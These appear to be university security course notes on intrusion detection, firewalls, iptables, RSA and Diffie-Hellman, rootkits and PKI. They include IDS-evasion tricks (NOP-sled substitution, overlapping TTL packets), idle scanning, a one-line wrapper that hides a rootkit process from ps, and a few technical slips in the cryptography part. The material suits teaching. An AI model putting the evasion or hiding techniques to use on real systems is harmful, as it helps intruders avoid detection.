intrusion detection system (APIDS) consists of a system or agent that would typically sit within a group of servers, monitoring and analyzing the communication on application specific protocols. For example; in a web server with database this would monitor the SQL protocol specific to the middleware/business-login as it transacts with the database. A host-based intrusion detection system (HIDS) consists of an agent on a host which identifies intrusions by analyzing system calls, application logs, file-system modifications (binaries, password files, capability/acl databases) and other host activities and state. An example of a HIDS is OSSEC. A hybrid intrusion detection system combines two or more approaches. Host agent data is combined with network information to form a comprehensive view of the network. An example of a Hybrid IDS is Prelude. In a passive system, the intrusion detection system (IDS) sensor detects a potential security breach, logs the information and signals an alert on the console and or owner. In a reactive system, also known as an intrusion prevention system (IPS), the IDS responds to the suspicious activity by resetting the connection or by reprogramming the firewall to block network traffic from the suspected malicious source. This can happen automatically or at the command of an operator. Problems with IDS The IDS itself is a juicy target as it is connected to every subnetwork, with root access. How do we respond once an attacker is detected? False alarms; the stricter the rules, the more false positives, increasing disruption and response Too many False Positives (IDS going off when no attacker is present) could render the response system useless or too expensive/ Monitoring the system is expensive You could physically disable the IDS sensors If a good system, than the level of annoyance will be huge. There are a limited number of IDS implementations and any well funded

attacker can craft an attack that will slip pass the IDS; Asymmetry How do you detect stuff? Detecting an exploit by looking for a nop sled? The black hat can replace the NOP sled with a similar action (which does nothing) but appears much more innocent, eg: relative jumps double XOR (careful though, won't work if you jump to the wrong address and do an odd number of jumps!) floating point operations (relatively slow) Deadly Packet Send overlapping packets A stupid IDS will check the first one, then assume that the firewall will drop the overlapping one without actually checking it. But, if you set the time-to-live on the leading packets to be small enough, then these will die before reaching the firewall and the firewall will only receive the malicious packets that the IDS has ignored! Send a non-malicious packet first with short TTLs Send a malicious packet second with longer TTLs The system will get the first packet and clear it. The system will get the second packet later, see the sequence number and drop it. The target will get the clear message for the given sequence number. The target will get the first packet, check the TTL and drop it. The target will get the second packet, know that it's cleared by the IDS and assemble it. example: packets are presented as (sequence number, time-to-live): Firewall <= IDS <= (1, 1) <= (1, 10) <= (2, 1) <= (2, 10) <= (3, 1) <= (3, 10) <= internet but firewall will only get this: Firewall <= (1, 9) <= (2, 9) <= (3, 9) <= IDS <= internet which is valid? The sequence numbers are presented here as contiguous integers for simplicity. In reality they are done a little differently, but the principle still applies, its just a little harder

Firewalls
Dedicated piece of hardware or a software program that regulates the flow of traffic between the computer and the computer network. A firewall is machine that sits on the side of your network or sometimes outside your network and decides which packets to let in. It will refuses packets doesn't trust, and accept packets it trusts. The job of firewall is to decide which packets should get though, but sometimes your firewall can be tricked and leaving your network vulnerable to exploitation. If I want to attack your computer it involves me sending input to a program already running on your computer. You might think that I can't attack your computer if you don't have anything running, but when packets come, your operating system inspects those packets and decides what to do with them. It then usually decides to run a program to deal with this packets themselves, so the mere act of sending packets to your computer can start my exploit program on your computer.

Computers on a network are like eager bunnies waiting to service requests. Unfortunately they will also service the requests of bad guys. Hardware Firewall: separate device or set of devices configured to permit, deny, encrypt, or proxy all computer traffic between different security domains based upon a set of rules and other criteria. Software Firewall: piece of software installed in the computer that inspects network traffic passing through it, and denies or permits passage based on a set of rules. Two main methods of operation Exclusive: Allow all traffic through unless it matches a filter Inclusive: Deny all traffic unless it matches a filter (safer - less chance of unwanted traffic passing through) The concept behind a firewall: if a bad guy gets a packet in and the response program has a vulnerability, the bad guy has your machine. You can harden your machine by turning some programs off so they won't respond, always installing the latest patches and not using programs with known vulnerabilities. What is the problem with a policy of hardening your machine? Most users won't do it. So admins only let the network traffic in through a little gate into the network, known as a firewall. Advantages of Firewalls Increases the sense of security. Protects computer(s) from malicious code entering into the system. Disadvantages of Firewalls Can be difficult to configure correctly. System resources are utilized in the case of a software firewall, which slows down the overall performance. If the OS is compromised, then the software firewall can be compromised. Problems with firewalls 1. They make people inside feel safe (over confident), but safety is not guaranteed... some packets will eventually get through. 2. They often protect against incoming traffic, but sometimes programs on your computer will set up connections outside you network, and give an attacker direct access to your machine. 3. Attackers may gain access via a wireless card operating inside the network. 4. Attackers may bypass your firewall by tunnelling. 5. They may also attack the firewall itself We don't want to slow our network by making our firewall a bottle neck. This is bad as it will frustrate users and also alert attackers to the presence of the firewall, which they may then attack. The firewall can choose to swallow bad packets, but what if the packet it from a user who is trying to get into the network the wrong way? Legitimate users may be rejected. However dropping packets makes the firewall look like it is not present, which means attackers glean less information about how they might attack it. Simple Firewalls just look at the IP header of a packet to see if it should be accepted, rejected or dropped. This is called an IP filter. They look to see what type of

packets they are, where packets claim to be coming from and going to and what port numbers the packets address. Better Firewalls set up state information about the packets. I.e, they only allow incoming packets that are part of a continuing connection that was set up on the inside. Even Better Firewalls Look what the packet contains exactly - Like a doorman searching your pockets.

Types Of Firewall
Network Layer Firewalls
These are essentially packet filters, which operate at a relatively low level of the TCP/IP protocol stack, not allowing packets to pass through the firewall unless they match the established rule set. There are two categories: 1. Stateless Filtering examines headers of packets requesting connection to computer behind firewall compares information in header with iptables (ie access control lists) to decide if the packet should be dropped/passed easy to circumvent - IP Spoofing is "stateless" - so doesn't check if packet is part of existing stream or not allow direct connections from external network to internal network 2. Stateful Filtering examines the content of packet as well (depends on TCP's 3-way handshake SYN/SYN,ACK/ACK) able to determine the state of the communication (start of new conn, part of existing conn, or invalid packet) will close off ports until connection to specific port is requested prevent attacks that take advantage of existing connections vulnerable to DOS attacks if a lot of new connections are opened very fast can also handle connectionless protocols: UDP if use Linux as a firewall, overhead can be low as filtering is done at kernel level

Application Layer Firewall


These work on the application level of the TCP/IP stack, and may intercept all packets travelling to or from an application. It limits the access which software applications have to the operating system services, and consequently to the internal hardware resources found in a computer. can prevent all unwanted outside traffic from reaching protected machines. patching OS's logic flaw - close the loophole around the OS more tightly and to make the chance of unwanted code execution extremely slim. can restrict or prevent outright the spread of networked computer worms and trojans on inspecting all packets for improper content. May have their own logical flaws - just like any other software

Proxies

A proxy device may act as a firewall by responding to input packets, whilst blocking other packets. make tampering with an internal system more difficult make misuse of one internal system would not necessarily cause a security breach crackers may still employ methods such as IP spoofing to attempt to pass packets to a target network

Network Address Translation


This is a technique that hides an entire address space, which hides the true address of protected hosts

Getting Around Firewalls


Port scanning involves someone bombarding a firewall with packets and checking what they get back, to alert them of how the firewall treats different packets. If a packet is dropped, they will receive no response. If a packet is rejected, they will receive an error message response. If the packet it accepted they will receive a happy response. nmap can be used to do this. To escape detected, a bad person can even schedule the packet sending so they go off at random intervals over a long period of time. Attackers can use firewalls against you, by sneaking a packet through or attacking the firewall machine itself.

Common firewall attacks


Port Scanning Attack
As its name, the attacker uses it to find out the available ports to break into. Idle scanning involves sending a packet to a computer ensuring that it can't detect it was you. To begin, you send a dummy syn packet to a zombie machine, by considering the reply's sequence number you can (without randomised sequence numbers) predict the zombie's next outgoing packet's sequence number. You then send the scanning packet to the target machine spoofing as the dummy. You then send another syn packet to the zombie, and if the sequence number doesn't match the expected sequence number, then the target did respond. Otherwise, it didn't. * Protection: Port scanning acts as a pre-face to attack, so usually you cannot and do not have to do much about it.

Denial-of-Service (DoS) Attack


The basic idea of this attack is attempting to make the computer consumed up all resources so that it refuses services for legitimate users. There are several different types of DoS attacks. ICMP ping flood The attacker overwhelms the victim with ICMP Echo Request packets (ping). As a result, the network's bandwith is quickly used up, preventing legitimate packets from

getting through to their destinations. Protection: use firewall to filter ICMP Echo Request packets, or to limit the rate at which your firewall will pass ICMP Echo Request packets. TCP SYN flood

A normal connection between a user (Alice) and a server. The three-way handshake is correctly performed.

SYN Flood: The attacker sends heaps of packets but does not send the "ACK" back to the server. The connections are hence half-opened and consuming server resources. The attacker kept doing this until all the server resources are used up. As a result, when legitimate user tries to connect, the server refuses to open a connection because it runs out of resources, and hence a denial of service. Protection:limit the number of new connections from a source per time frame

SSH Brute-Force Attack


These refer to Practically all UNIX-based servers run a SSH server to allow remote administration across the Internet. From time to time, you might notice a large number of failed login attempts. Often, these are brute-force attacks against your SSH server. Protection: Change the default port: It only stops hackers who are just scanning for SSH servers on the default port. Advanced port scanner will reveal the daemon on a non-standard port easily. Disable Root Access: If you enable your remote root access, it is dangerous for a brute-force attack. If root access is disabled, the attacker might still be able to login as a non-privilege user and then exploit to be a super-user. Limit Connections: It should not be noticed by legitimate user, but will delay the attackers when repeated brute-force attempts are made. Disable Password Authentication: The idea is to use a pre-assigned private key instead of password authentication because password is far easier to guess and

break. Deploy Anti-Brute-Force Tools: SSHDFilter, Deny-Host, Brute-Force Detection etc.

Spoofing Attack
One person or program successfully masquerades as another by falsifying data and thereby gaining an illegitimate advantage. IP Address Spoofing The packet's IP address is manipulated to a different one so that it appears to be sent from a different machine. Can be used in SYN Flood where the attacker does not care about the conversations but wants to flood the victim. Spoofing also made packets hard to filter Can be used by network intruders to defeat network security measures, such as authentication based on IP addresses. Protection: Packet filtering. The gateway usually does an ingress filtering, which filters the external packets if they have an IP address of internal machine (protects from spoofing the internal address) DNS Cache Spoofing The attacker exploits DNS software flaw, and makes the server accept false information, such as replace arbitrary content with attacker's choices Protection: being less trusting of the information passed to them by other DNS servers ignoring any DNS records passed back which are not directly relevant to the query

Christmas Tree Packets Attack


A Christmas tree packet is a packet with every single option set for whatever protocol is in use. It is named so because the packet's all options are "turned on", just like a Christmas tree which is surrounded by the colourful little light bulbs. 1. Can be used for information detection: attacker sent a Christmas tree packet to victim, and analysed the response to acquire information. 2. A large number of Christmas tree packets can also be used to conduct a DoS attack by exploiting the fact that Christmas tree packets require much more processing by routers and end-hosts than the 'usual' packets do. Protection: Christmas tree packets are highly suspicious as they are not commonly in use. However, they can be easily detected and filtered by intrusion-detection system or advanced firewalls.

Iptables
Iptables is the most popular linux firewall distribution and is available with most major linux distributions.

General iptables concepts


Used to setup, maintain and inspect tables that contain rules in the Linux kernel to filter packets. Each table will contain chains; each chain has a list of rules which can match packets; and each rule has a target which determines what will happen to the packet if it matches (see Glossary). There are 3 predefined chains in iptables (INPUT, FORWARD, OUTPUT). These 3 chains will each have a policy which is what will happen to the packet if the packet goes through all the list of rules in the chain and does not match any of the rules. The rules in the chain are matched in order and once it matches, the target (action) is implemented. Targets such as ACCEPT and DROP determine the ultimate fate of the packet - allow or block. In diagram bellow, iptables have been setup in white#1 (192.168.100.1) accept all traffic going out from white#1 and block all traffic coming into white#1 unless it matches one of the four rules. In this example white#8 is trying to access white#1 via Telnet (port 23) - this does not match any of the rules and therefore the policy for the INPUT chain is applied - the packet is dropped, so white#8 will not be gain access to white#1.

Note: For this lab, the FORWARD chain is not used as the traffic is directly from white#8 (outside computer) to white#N (your computer). The FORWARD chain is used if traffic is going through the machine - so from an outside machine, through the firewall and passed onto another machine on the internal network.

Commonly used targets (actions)

target ACCEPT DROP LOG REJECT

Description The packet is accepted and handed over The packet is denied and dropped The packet will be logged and processed with the next rule Similar to drop, but an error message will be sent to the host who sent the packet

General Iptables Switches


command switch -j <target> -A -P -N <name> -F [chain] Description jump to specific target when matching packet is found append rules to the chain changes the policy for the specified chain (one of INPUT, FORWARD, OUTPUT) creates a new user-defined chain with the specified name flushes/empties out all the rules of the specified chain. If you don't specify a chain, ALL chains will be empted removes a user-defined chain specified by name. If you don't specify a chain, ALL user-defined chains will be removed. Note: the chains must be empty (use flush) before they can be removed) match "input" interface where packet enters (e.g. eth0, PPPoE) Used for INPUT/FORWARD chain match "output" interface where packet exits (e.g. eth0, PPPoE) Used for OUTPUT/FORWARD chain match source ip address match destination ip address specify matching protocols (e.g. tcp, udp, icmp) match destination port for tcp/udp traffic (note --dport switch must be used with '-p tcp' or '-p udp') match destination port RANGE from start to end ports for tcp/udp traffic (note --dport switch must be used with '-p tcp' or '-p udp') match source port for tcp/udp traffic (note --sport switch must be used with '-p tcp' or '-p udp') match source port RANGE from start to end ports for tcp/dup traffic (note --sport switch must be used with '-p tcp' or '-p udp') will match for packets that have the SYN bit set and ACK,RST,FIN bits cleared. Packets that that are initiating a TCP connection will match this condition

-X [name]

-i <interface> -o <interface> -s <ip-address> -d <ip-address> -p <protocol> -p tcp --dport <port> -p tcp --dport <start:end> -p tcp --sport <port> -p tcp --sport <start:end> -p tcp --syn

Usage Examples
TCP traffic coming from anywhere through port 23 will be dropped /sbin/iptables -A INPUT -i eth0 -p tcp --dport 23 -j DROP TCP traffic coming from 192.168.100.8 through port 23 will be dropped /sbin/iptables -A INPUT -i eth0 -p tcp -s 192.168.100.8 --dport 23 -j DROP TCP traffic going out from the machine through port 25 will be let through /sbin/iptables -A OUTPUT -o eth0 -p tcp --dport 25 -j ACCEPT ICMP traffic coming from 192.168.100.8 will be blocked. ie. white#8 can't ping the machine /sbin/iptables -A INPUT -s 192.168.100.8 -p icmp -j DROP TCP traffic coming from 10.0.0.0 to 10.0.255.255 will be blocked. (xxx.xxx.xxx.xxx/yy where yy is a mask) /sbin/iptables -A INPUT -s 10.0.0.0/16 -p tcp -j DROP Sets the policy for INPUT chain so any packet that has not matched the rules will be dropped /sbin/iptables -P INPUT DROP Flushes all the rules in OUTPUT chain /sbin/iptables -F OUTPUT

Advanced Iptables Concepts


Match Extensions iptables can have fairly complex rules which provide great flexibility in managing how the packets are filtered. One advanced feature that allows you to create complex rules is the use of extended packet matching modules. There are two ways to load these extension modules 1. Implicitly: -p or --protocol. You have already seen this, eg if you have -p tcp iptables will load all tcp extensions (eg --dport, --sport, --syn etc) 2. Explicitly: -m or --match. Using -m <module> will explicitly tell iptables to load a specified module. There are many extension modules, some common modules are: limit, recent.
Limit Module

The limit module restricts the rate of matches. It will only match a given number of times per second (the default is 3 matches per hour with a burst of 5). Burst indicates the number of matches that will be allowed before the limit kicks into action. There are two optional parameters for the limit module: 1. --limit <number>: specifies the maximum average number of matches to allow per second. You can specify units explicitly, using '/second', '/minute', '/hour' or '/day', or parts of them (so '5/second' is the same as '5/s'). 2. --limit-burst <number>: indicating the maximum burst before the limit kicks into action.

The way limit and limit-burst work together is easiest explained by an example:
/sbin/iptables -A INPUT -m limit --limit 1/min --limit-burst 3 -j LOG

The first time this rule is reached, the packet will be logged. In fact, since the burst is set to 3, the first 3 packets will be logged. After this, it will be 1 minute before the next packet will be logged from this rule, regardless of how many packets reach it. Also, for every minute which passes without matching a packet, one of the burst will be regained. So if no packets hit the rule for 3 minutes, the burst will be fully recharged back to 3. Usage Example Limits any incoming TCP packets at a rate of 3 per minute and limit burst of 5 /sbin/iptables -A INPUT -p tcp -m limit --limit 3/min --limit-burst 5 -j ACCEPT

Recent Module

Allows you to dynamically create a list of IP addresses and then match against that list in a few different ways. For example, you can create a 'badguy' list of people who have been attempting to connect to port 23 on your firewall and then DROP all future packets from the 'badguy' list. It is a bit like creating a dynamic blacklist. Some useful recent module switches switch --name [string] --set --rcheck --update --hitcount <number> --seconds <number> Description Specifies the name of the list. If no name is given 'DEFAULT' will be used This will add the source address of the packet to the list. If the address already exists, it will update the entry. Checks if the source address is in the list. Like --rcheck, except if it matches, it will update the 'last seen' timestamp Will only match if the address is in the list AND the packets received is greater than or equal to the given value. Must be used with one of --rcheck or --update Will only match if the address is in the list AND it was last seen within the given number of seconds. Must be used with one of --rcheck or --update

Here are two examples of the recent module in action. Example 1

/sbin/iptables -A INPUT -i eht0 -p tcp -m recent --rcheck --seconds 60 -j DROP /sbin/iptables -A INPUT -i eth0 -p tcp -d 100.42.1.0/24 -m recent --set -j DROP

In Example 1, anyone trying to send data using TCP protocol to 100.42.1.0~100.42.1.255 is considered a bad guy (Rule#2). The first packet trying to send data to 100.42.1.0/24 will not match the Rule#1, but will be caught by Rule#2. Once it has been caught by Rule#2, the source address will be put into the recent list and that packet will be dropped. Any subsequent packets from that source address will be dropped - regardless of the nature of the packet (destination address, destination port etc). Example 2
/sbin/iptables -A INPUT -i eht0 -p tcp -m recent --update --seconds 60 -j DROP /sbin/iptables -A INPUT -i eth0 -p tcp -d 100.42.1.0/24 -m recent --set -j DROP

Example 2 is identical to Example 1 except it uses --update instead of --rcheck in Rule#1. This means that every subsequent packet from a source address in the list will cause the 'last seen' timestamp for that address to be updated. Therefore there must be a "quiet time" (ie. no activity) of 60 seconds from that source address before any packets coming from it will even be considered. For more information (and more switches) you can use man iptables

Glossary

Chain: There are 3 predefined chains:


1. INPUT - traffic coming directly to the machine from the outside world 2. FORWARD - traffic coming to or going from a networked machine to the outside world 3. OUTPUT - traffic going directly from the machine to the outside world A chain contains a series of rules. As a packet traverses a chain it will be examined by each rule until it matches a rule that will determine it's ultimate fate (eg. by jumping to ACCEPT or DROP). If none of the rules matches, and the packet reaches the end of the chain the policy for the chain will be implemented. In addition to these 3 predefined chains, you can also create your own chains: user-defined chains. The main differences between user-defined chains and predefined chains are: user-defined chains DO NOT have policies. names for user-defined chains by convention are in lowercase

Policy: Determines the fate of the packet (eg. ACCEPT, DROP) if it reaches the
end of the chain. Note, policies only apply for the 3 predefined chains.

Rule: Contains specifications which may match a packet.


If the packet matches the rule, an action will be taken as indicated by the target.

If the packet does not match the rule it will be passed on to the next rule in the chain.

Target: Can be thought of as the action that is taken. Common targets are:
ACCEPT - lets the packet through. iptables stop further processing. DROP - blocks the packet. iptables stop further processing. REJECT - blocks the packet and sends an error message (ICMP port unreachable) to the host. iptables stop further processing. RETURN - is like falling off a chain. If it is the target for a predefined chain, the policy is executed. For a user-defined chain, the packet will continue to traverse at the previous chain at the rule just after the rule which jumped to the user-defined chain (eg. if from INPUT chain the packet jumped from rule2 to sshrules and matched a rule with RETURN target, the packet will continue traversing the INPUT chain from rule3) LOG - provides logging for matching packets. There are two additional options for LOG --log-level <name or #>: Specifies the level of logging. Levels are: debug, info, notice, warning, err, crit, alert and emerg (7 to 0). Default is warning (level 4) --log-prefix <string>: String can be up to 29 chars and is sent at start of logging to allow log to be uniquely identified.

Week6/NiceNotes
Confidentiality with Public Keys
Public Key Cryptography
Also known as 'Asymmetric cryptography' is a form of cryptography in which the key used to encrypt a message differs from the key used to decrypt it. User has a pair of cryptographic keys: Private Key Private Key is kept secret Generally the private key is used for message decryption Public Key Public Key is made publicly available Generally the public key is used for message encryption

Types of Public Key Cryptography


The two main branches of public key cryptography are: 1. Public key encryption: a message encrypted with a recipient's public key cannot be decrypted by anyone except the recipient possessing the corresponding private key. This is used to ensure confidentiality. 2. Digital signatures: a message signed with a sender's private key can be verified by anyone who has access to the sender's public key, thereby proving that the sender signed it and that the message has not been tampered with. This is used to ensure authenticity.

Public Key Cryptography in Practise


Generating the Key

A big random number is used to make a public-key/private-key pair.

Encrypting a Message

In encryption, if Bob wants to send Alice a message that only Alice can read, he encrypts it using Alice's public key. When Alice receives the ciphertext, she'll decrypt it using her private key. i.e. In an encryption scheme anyone can encrypt using the public key, but only the holder of the private key can decrypt. Security depends on the secrecy of the private key.

Using Digital Signatures

In signing, if Alice wanted to send Bob a message that only Alice could make, she would encrpyt the document with her private key and anyone could decrpyt the message using Alice's public key to verify that she was the one that signed it. i.e. In a signature scheme the private key is needed to sign a message; but anyone can check the signature using the public key. Validity depends on private key security.

Diffie-Hellman Key Predistribution Scheme

In the Diffie-Hellman key predistribution scheme, each party generates a public/private key pair and distributes the public key. After obtaining an authentic copy of each other's public keys, Alice and Bob can compute a shared secret offline. The shared secret can be used as the key for a symmetric cipher.

Public Key Encryption


Merkle Synopsis: Say Alice wants to talk to Bob to set up a session key over an unsecure channel. Now Alice has a large numbered notepad and she writes a different password onto each page. Alice then makes a copy of that notepad and encrypts each page, including the page number and rips out page after page and sends them off to Bob randomly. Bob upon receiving all of these encrypted pages chooses one at random and brute forces out the password. Once this is done, he sends back the page number to Alice to start using the password on that page as their session key. Why this works: This algorithm works because the password is never actually sent through the channel directly. As an example, assume Trudy has been sniffing the channel and has passively intercepted all messages. She has a encrypted copy of every page of the notepad and knows which page number the password is on. However, to actually work out the password, she has to brute force the encryption of every page until she finds that page number ( as the page number is also encrpyted). On average, she will have to brute force approximately half of every page sent before she finds the page Alice and Bob's password page. Diffie-Hellman Synopsis: This algorithm takes advantage of the commutative property of powers, ie, g(ab)== g(ba) and that if we are given ga and gb, it is still hard ( non-polynomial) to work out gab. Step-by-step (sourced from wikipedia)

Here Alice has her own secret a, Bob has his own secret b and the shared secret is gabmod p which is equal to gbamod p. Yet someone sniffing the channel could only receives gamod p and gb mod p and there is no known fast method of working out gabmod p from these.

RSA Synopsis: This algorithm relies on the mathematical hardness of factoring large numbers The algorithm: First choose two large primes p & q Calculate n = p x q Calculate the totient phi = (p-1)(q-1) Find a number e, which is relatively prime to n Calculate d, s.t. de = 1 mod (phi) From this, we have the public key pairing (n,e) and the private key pairing (n,d) Encryption using public key Ciphertext = messageemod n Decryption using private key message = ciphertextdmod n Further Explanation 1. Choose two large prime numbers, p and q. RSA Laboratories recommends that the product of p and q be on the order of 768 bits for personal use and 1024 bits for corporate use. The larger the values, the more difficult it is to break RSA, but the longer it takes to perform the encoding and decoding. 2. Compute n = pq and z = (p - 1)(q - 1). 3. Choose a number, e (where e < n) which has no common factors (other than 1) with z. (In this case, e and z are said to be relatively prime). The letter e is used since this value will be used in encryption. 4. Find a number, d, such that ed - 1 is exactly divisible (that is, with no remainder) by z. The letter d is used because this value will be used in decryption. Put another way, given e, we choose d such that the integer remainder when ed is divided by z is 1. (The integer remainder when an integer x is divided by the integer n, is denoted x mod n). 5. The public key is the pair of numbers (n,e); and the private key is the pair of numbers (n,d). Example & Proof 1. Chooses p = 5 and q = 7. (Admittedly, these values are far too small to be secure.) 2. Then n = 35 and z = 24. 3. Chooses e = 5, since 5 and 24 have no common factors. 4. Chooses d = 29, since 5 * 29 - 1 (that is, ed - 1) is exactly divisible by 24. 5. The public key is the pair (35,5) and the private key is the pair (35,29) Given a bit pattern m, we can compute the encrypted value c by: c = me mod n

To decrypt c: m = cd mod n Letting a = 1, b = 2 etcz = 26 Plain text letter l o v e m (numeric value) 12 15 22 5 me 248832 759375 5153632 3125 c = me mod n 17 15 22 10

Therefore, love => qovj m= cd mod n 12 15 22 5

Cipher value (c) 17 15 22 10

cd 481968572106750915091411825223072000 12783403948858939111232757568359400 8.5164331908653770195619449972111e+38 10000000000000000000000000000

Plaintext letter l o v E

Due to the large numbers used in the RSA algorithm, RSA is relatively slow at encrypting. Why does RSA work? From above, (me mod n)d mod n = m Use special property - if p and q are prime and n = pq, then xy mod n = x(y mod (p-1)(q-1)) mod n So, (me mod n)d mod n = med mod n med mod n = m(ed mod (p-1)(q-1)) mod n Given ed+1 mod (p-1)(q-1) = 0, ed mod (p-1)(q-1) = 1, so m(ed mod (p-1)(q-1)) mod n = m1 mod n = m Summary of RSA: To use RSA, we calculate the public, private key pairing once and let the public key be known. Now whenever somebody wants to send us a message that only we would be able to decipher, they encrypt it using our public key. However this leads to the problem of key distribution.

Digital Signatures
Used for authentication, non-repudiation, uniquely identification, unforgeable (hopefully), non transferable A digital signature scheme typically consists of three algorithms: A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key. A signing algorithm which, given a message and a private key, produces a signature. A signature verifying algorithm which given a message, public key and a signature, either accepts or rejects. Benefits of digital signatures: Authentication Integrity (i sent it and this is what i sent) Drawbacks of digital signatures: Non-repudiation

Rootkits
Rootkit: A program(s) designed to take fundamental control of a computer system without authorisation, by obscuring their presence Key features: One or more small programs Attempt to obscure/hide their presence to last on the system longer Generally try to gain root level access, or allow actions as system administrators - hence the name While they wish to take over some functionality of a computer they are not designed to destroy the host machine. Designed to do a number of things. These can include Key logger Create spam box Sniff the entire network for more targets Launch DOS from (with a large enough number) Give back-door-access to a computer DRM (such as Sony) Offer honeypot for other attackers Rootkit's are often confused with both viruses and trojan's and indeed all three share many similar properties. They all use some vulnerability in the computer to get themselves on the system, and try to take over the users computer. However there are some key differences. Rootkit's, unlike virses or trojans, do NOT: Self replicate (although some may be wrapped in virus code which performs

this task) Destroy a computer's system

Classification
Firmware - the rootkit lives in your firmware such as router Virtualized - the rootkit loads itself first, then load the operating system as a virtual machine Kernel Module - the rootkit loades itself as a kernel module Library - the rootkit replaces or modify system libraries Application - the rootkit replaces or modify applications such as ls, ps

Rootkit Lifecycle
1. 2. 3. 4. 5. (attacker) Installation of the rootkit (attacker) Hiding the rootkit (user) Detecting the rootkit (user) Removing the rootkit (user) Preventing rootkit's being installed.

Installation In order to install a rootkit, root/admin access are usually required. Attackers can gain access via: Exploiting vulnerabilities in the hosts computer. For example, Microsoft GDI buffer overflow Social Engineering methods. Think of any way virus/trojan is able to get into a computer and a rootkit is able to do that as well. Once the attacker has gained privilege access, the rootkits are often installed as follows: User level On UNIX, the rootkit is downloaded using ftp, then untar/unzip into the desired directory (similarly for Windows based systems) The rootkit can also be compiled on the host machine, to embed itself with the operating system better. Kernel-mode rootkit uses a similar method It usually installs a false device driver which works in conjunction with kernel code. As the complexity of the rootkit increases, so does the installation procedure. Hiding The methods that rootkit's use to install themselves also lead to how they hide themselves. The level of complexity a rootkit takes also defines how hard the rootkit can be to find. Since a rootkit is basically a process running in the background the even the most basic rootkit needs to do to basic things: Hide the running process. Hide itself in the directory structure

The simplest approach would be to create a wrapper around shell commands which would reveal it's presence. Such commands could include ps, ls, netstat, du, and more. A sample wrapper for could be
ps | egrep -v '<my_process_name>|egrep'

Notice that the egrep also needs to be hidden otherwise that would reveal the rootkit presence as well. However such a script can be easily detected. You could simply cat the ps command and reveal its presence. Also what happens when a user runs egrep and it does not show? So instead of trying to replace all of the commands with simply detected wrappers it would be of more benefit to replace each binary directly. Detecting swapped binaries is as simple as comparing the checksum of the system's binary, with binaries from the distribution server. More advanced rootkits install themselves as kernel modules. Conceptional these can be considered to provide a wrapper for the kernel. The modules map certain system calls (such as sys_read) to their own implementations (which could be a keylogger for example). Any command they are not interested in is simply ignored. The advantage of this is that system utilities such as ls and ps will not produce any trustworthy result about the presence of the rootkits. In addition, loadable module rootkits delete their entries in the kernel's record, thus making them very difficult to detect. Detection There are a few ways to detect a rootkits: Keep a checksum of each system binaries, and store them off the computer. Do routine comparison of system binaries using checksums. Monitor system logs, especially any deletion of last log. Runs some of the rootkit checkers, such as Rootkit Hunter, chkrookit. They check the default locations of common rootkits for any abnormalities. Monitor network usages. Monitor the system call table inside the kernel, as any rootkit would have modified the entries there. Removing Unless you have been able to determine exactly what the rootkit has done on your system, trying to uninstall the rootkit can be a hard task. They don't come with an uninstaller. Also for most of the decent rootkits which install as kernel modules, it can be impossible to remove the unit. The catch is that even if you are able to remove all the things that you find, you cannot be sure that you have removed the entire rootkit, as there is something that you have not found. The best (and maybe only) solution is to erase your hard drive and reinstall your operating system. Preventing Rootkits (as outlined above) are installed by the vulnerabilities of the system. Thus preventing installation requires you to prevent many of the activities that have already been discussed and will be covered in weeks to come. These include: Preventing exploits, make sure the system is up to date

Building a decent firewall Impose good security policy, such as minimal privilege And more... Damage Rootkits can leave a great damage to the system, not least by the excessive usage of system resources, but also due to loss of system information and network security. Once a system is compromised, it's very expensive to estimate the damage caused by rootkits. For example, if a company's computer is compromised, before the OS is installed, a snapshot of the compromised OS should be kept. So that security experts can look over the compromised image to determine the level of damage, such as lost of sensitive information, the extend of network sniffing, loss of users' passwords on other systems, and any contact this compromised OS has done with outside network. One estimates that a half an hour break in can lead to 40 man-hours' work to clean it up.

Tools for Rootkit Lab


They are: /usr/sbin/lsof /bin/ps /bin/netstat To do so, run them with sudo before the command line, like this: $ sudo /usr/sbin/lsof lsof To show all open files, directory, sockets and connection: # lsof To show only those belonging to user joe: # lsof -u joe To show only those belonging to process ID 3359: # lsof -p 3359 Since lsof shows the files opened by a process, it can be very useful to check if a process is writing some information to a log file (as a keylogger would do). ps Report a snapshot of the current processes. - /bin/ps To see every process: # ps -A or # ps -eF or # ps aux Note that ps -A shows the process name, and the other two command lines show the full command line of the processes running. To see every process run by root: # ps -u root You can also see the process hierarchy running this command: # ps -A -H netstat Print network connections, interface statistics - /bin/netstat List all tcp connections, the same for udp connections: # netstat --tcp

List all open sockets: # netstat -a To not resolve names: # netstat -n List processes the own the sockets: # netstat -p To list all connections, not resolve names and show the processes that own the sockets: # netstat -nap top Display Linux tasks: /usr/bin/top To monitor the process real time: # top To monitor process by user joe: # top -U joe To monitor by process ID, for example PID 3319: # top -p 3319 grep Print lines matching a pattern - /bin/grep Normally used at the end of a pipeline. For example, to find all lines containing the word "root" from ps
# ps -eF | grep "root"

To include the upper and lower N lines in the result, use "-nN", for example,
# cat some_source_code.c | grep -n5 "ToDo"

To display the results except the word "hello",


# cat some_source_code.c | grep -v "hello"

netcat Netcat can be useful on this lab when you want to check what kind of server is listening on a specific port of a machine. - /bin/nc This line connects at port 25 on 192.168.200.1. If an email server is running, you should see something like "220 barracuda.cse.unsw.edu.au ESMTP (8034632e795f6f3508e80497835884ea)". - $ nc 192.168.200.1 25 If you want to connect to a port using the UDP protocol, add -u to the nc command line: - $ nc -u 192.168.200.1 2222

Week7/NiceNotes
Engineering Security PKI + SSL

Public Key Infrastructure (PKI)


Example of dual control PKI arrangements enable computer users without prior contact to be authenticated to each other, and to use the public key information in their public key certificates to encrypt messages to each other. To decrypt, each user has their own private key, that is usually protected by a password and stored locally. Public Key Infrastructure is an arrangement that binds public keys with their respective user identities by means of a Certificate Authority (CA). The binding is made through a registration process either by software or human supervision. The certificates contain information such as the user identity, their public key, their binding, validity conditions and other attributes. The only problem with public keys is how do you get them out there. Key protocol without authentication: He asks for your public key You send him your public key He encrypts the message You get the message, and decrypt it with the private key The problem with this is that there is no authentication, and someone sniffing could modify the message, and send without anyone knowing. To solve this problem you have a trusted person. You trust this person that you are getting the correct public key. Certificate Authority: Trusted certificate authority, Theo wants to talk to Luke, so he asks the trusted authority for his key, authority gives it to him. You can end up with nets for trust as the certificate authorities sometimes authorise RA The CA's private key is used to sign a certificate in order to prevent the certificate from being tampered. The CA's public key is used to verify a certificate that has been signed with a private key has not been tampered with. What is a certificate? A certificate is a token which contains the: Owner's Public key, Owner's details such as owner name, country, etc. What is Certificate Revocation List (CRL)? 